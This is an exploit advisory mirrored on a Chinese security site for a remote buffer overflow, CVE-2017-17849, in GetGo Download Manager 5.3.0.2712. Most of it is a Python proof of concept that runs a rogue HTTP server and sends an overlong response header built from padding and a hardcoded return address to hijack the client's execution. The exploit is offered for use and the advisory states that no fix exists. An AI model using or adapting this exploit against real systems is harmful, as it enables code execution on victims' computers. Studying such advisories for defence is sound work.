首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GetGo Download Manager 5.3.0.2712 Buffer Overflow
来源:https://twitter.com/aloycemjr 作者:Makalanga 发布时间:2017-12-25  
# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712
# CVE: CVE-2017-17849
# Date: 22-12-2017
# Tested on Windows 10 32 bits
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr>
# Software Link: http://www.getgosoft.com/getgodm/ <http://www.getgosoft.com/getgodm/>
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution



1. Description

A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution on the victim computer.


2. Proof of Concept


def main():
    host = "192.168.205.128"
    port = 80

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, port))
    s.listen(1)
    print "\n[+] Listening on %d ..." % port

    cl, addr = s.accept()
    print "[+] Connection accepted from %s" % addr[0]

    evilbuffer = "A" * 4105
    hardCodedEIP= "\x69\x9E\x45\x76" #This is a hardcoded EIP just for demo :). As you can see on the screenshot, we hit a breakpoint, right here on this EIP. Do you see our stack!!! You need to change this.
    pads  = "C"*(6000 - len(evilbuffer + hardCodedEIP))
    payload = evilbuffer + hardCodedEIP + pads

    buffer = "HTTP/1.1 200 " + payload + "\r\n"

    print cl.recv(1000)
    cl.send(buffer)
    print "[+] Sending buffer: OK\n"

    sleep(3)
    cl.close()
    s.close()

if __name__ == '__main__':
    import socket
    from time import sleep
    main()



3. Solution:
   No solution as of yet.



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle MySQL UDF Payload Execu
·COMTREND ADSL Router CT-5367 -
·Trend Micro Smart Protection S
·Sendroid < 6.5.0 - SQL Injecti
·Xbox 360 Aurora 0.6b Default C
·Telesquare SKT LTE Router SDT-
·Netcore / Netis Routers - UDP
·SysGauge Server 3.6.18 - Denia
·Fortinet FortiGate 4.x < 5.0.7
·DotNetNuke DreamSlider 01.01.0
·Technicolor DPC3928SL - SNMP A
·ALLMediaServer 0.95 - Buffer O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved